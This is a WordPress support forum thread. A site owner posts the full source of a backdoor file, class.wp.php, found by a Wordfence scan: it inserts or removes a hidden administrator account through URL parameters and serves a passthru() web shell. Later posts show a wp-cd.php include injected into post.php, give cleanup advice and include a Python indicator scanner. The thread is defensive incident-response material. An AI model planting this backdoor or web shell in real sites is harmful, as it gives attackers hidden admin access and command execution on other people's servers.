• Resolved swhz

    (@swhz)


    I run bazar shop theme on my website.

    When I scanned with Wordfence, it detected an unknown file in my wp-includes directory named class.wp.php. I deleted the file from the directory but have kept a copy on my desktop for observation. I am posting the code here; kindly tell me whether it is malicious or not, and whether it has other files that go with it.

    <?php error_reporting(0);
    include $_SERVER['DOCUMENT_ROOT'].'/wp-load.php';
    $table_name = $wpdb->get_blog_prefix();
    // serialized capabilities array that grants the "administrator" role
    $sample = 'a:1:{s:13:"administrator";b:1;}';
    if( isset($_GET['ok']) ) { echo '<!-- Silence is golden. -->';}
    // ?awu : inserts a hidden administrator account (ID 1001010) with a hard-coded password hash
    if( isset($_GET['awu']) ) {
    $wpdb->query("INSERT INTO $wpdb->users (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES ('1001010', '1001010', '\$P\$B3PJXeorEqVMl//L3H5xFX1Uc0t5870', '1001010', '[email protected]', '', '2011-06-07 00:00:00', '', '0', '1001010');");
    $wpdb->query("INSERT INTO $wpdb->usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (1001010, '1001010', '{$table_name}capabilities', '{$sample}');");
    $wpdb->query("INSERT INTO $wpdb->usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '1001010', '{$table_name}user_level', '10');"); }
    // ?dwu : removes that account again
    if( isset($_GET['dwu']) ) {
    $wpdb->query("DELETE FROM $wpdb->users WHERE `ID` = 1001010");
    $wpdb->query("DELETE FROM $wpdb->usermeta WHERE $wpdb->usermeta.`umeta_id` = 1001010");}
    // ?console : web form whose submitted 'cmd' value is handed to passthru()
    if( isset($_GET['console']) ) {
    function MakeSimpleForm() { ?>
    <form method='GET' action='<?=$_SERVER['PHP_SELF']?>'>
    <input type=text name='cmd'> <input type=submit name='exec' value='ok'> </form>
    <? }
    function DoCmd($cmd) { ?>
    <textarea rows=30 cols=80><?=passthru($cmd)?></textarea><br>
    <? }
    if ( isset($_REQUEST['exec']) && isset($_REQUEST['cmd']))
    DoCmd($_REQUEST['cmd']); else MakeSimpleForm();
    }?>
Viewing 10 replies - 1 through 10 (of 10 total)
  • wfalaa

    (@wfalaa)

    Hi swhz,
    Using this code, someone may insert or delete a user with admin privileges in your database. Deleting this file was the right thing to do; I would also recommend the following:
    – Make sure WordPress, themes and plugins are all updated to the latest stable version.
    – Change your FTP/cPanel password.
    – Compare the number of users you have in (WordPress Dashboard > Users) with those in the “wp_users” database table.

    Thanks.

    Thread Starter swhz

    (@swhz)

    Thank you very much for replying.

    I have done as you said, fortunately there are no suspicious users in the database.

    Thank you again for helping and thank you for the amazing plugin.

    Filename: wp-includes/post.php
    File type: WordPress Core File

    The Original Version of the file:
    <?php
    /**
     * Core Post API
     *

    The Modified Version on your WordPress system:
    <?php if (file_exists(dirname(__FILE__) . '/wp-cd.php')) include_once(dirname(__FILE__) . '/wp-cd.php'); ?><?php
    /**
     * Core Post API
     *

    wfalaa

    (@wfalaa)

    @yiggory Following your thread here, I recommend choosing the “Restore the original version of this file.” option, as there is no “wp-cd.php” file in a default WordPress installation.

    Thanks.

    OK, restored, and also deleted other warning files.

    Had the same suspicious file in my system. Deleted… and guess what, it came back. Looking for the culprit now.
    Does anybody have an idea how to best track the creation of this file?
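    A file-level check for the two indicators this thread documents (the dropped wp-includes/class.wp.php and the wp-cd.php include prepended to post.php), added here as an example; it is not code from the thread or from Wordfence, and the WordPress tree it scans is a constructed sample written to a temp directory, not a real site.

```python
import os
import re
import tempfile

# Names from the thread: the dropper class.wp.php (a look-alike of the legitimate
# class-wp.php) and the wp-cd.php that the modified post.php tried to include.
SUSPECT_NAMES = {"class.wp.php", "wp-cd.php"}
# The one-line include Wordfence showed prepended to wp-includes/post.php.
PREPENDED_INCLUDE = re.compile(
    r"include_once\s*\(\s*dirname\s*\(\s*__FILE__\s*\)\s*\.\s*['\"]/wp-cd\.php")
# Strings taken from the dropper posted above: its admin-capability blob and passthru().
PAYLOAD_MARKERS = ('a:1:{s:13:"administrator";b:1;}', "passthru(")

def scan_tree(root):
    """Walk a WordPress install; return sorted (relative path, reason) findings."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if name in SUSPECT_NAMES:
                findings.append((rel, "suspect filename"))
            if not name.endswith(".php"):
                continue
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            if PREPENDED_INCLUDE.search(text[:512]):  # the injected include sits on line 1
                findings.append((rel, "prepended include of wp-cd.php"))
            if any(marker in text for marker in PAYLOAD_MARKERS):
                findings.append((rel, "dropper payload markers"))
    return sorted(findings)

def build_sample_tree():
    """Constructed sample install (not a real site): one clean core file, two indicators."""
    root = tempfile.mkdtemp()
    inc = os.path.join(root, "wp-includes")
    os.makedirs(inc)
    samples = {
        "class-wp.php": "<?php\n/**\n * WordPress environment setup class.\n */\nclass WP {}\n",
        "post.php": "<?php if (file_exists(dirname(__FILE__) . '/wp-cd.php')) "
                    "include_once(dirname(__FILE__) . '/wp-cd.php'); ?><?php\n/**\n * Core Post API\n */\n",
        "class.wp.php": "<?php error_reporting(0);\n$sample = 'a:1:{s:13:\"administrator\";b:1;}';\n"
                        "<textarea><?=passthru($cmd)?></textarea>\n",
    }
    for name, body in samples.items():
        with open(os.path.join(inc, name), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root

if __name__ == "__main__":
    for rel, reason in scan_tree(build_sample_tree()):
        print(f"{rel}: {reason}")
```

    Pointing scan_tree() at a real document root reports the same three kinds of findings; a filename hit on a file that differs from a fresh core download, as the last reply in this thread checked for class-wp.php, is the one to act on.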

    I have found some entries in your active themes function.php file. As well as wp-post.php ( looking for wp-cd.php ) and a DB entry but I forgot what the table was called.

    The strange thing is that I noticed this locally. Almost all of my local WordPress sites had this happen to it.

    All of my local sites are .dev extensions, so to have them mostly affected is strange. If you do find out what causes it, please let me know. I usually use the same group of plugins on every site.

    @adampatterson I’m not sure what you mean by “active themes function.php file”? Is this something related to the Wordfence plugin?

    Thanks.

    @wfalaa I was not using Wordfence, sorry; I was searching for ‘wp-cd.php’ and offering my observations.

    I got an alert for wp-includes/class-wp.php. I downloaded the latest from www.remarpro.com and the file was identical.

  • The topic ‘Class.wp.php’ is closed to new replies.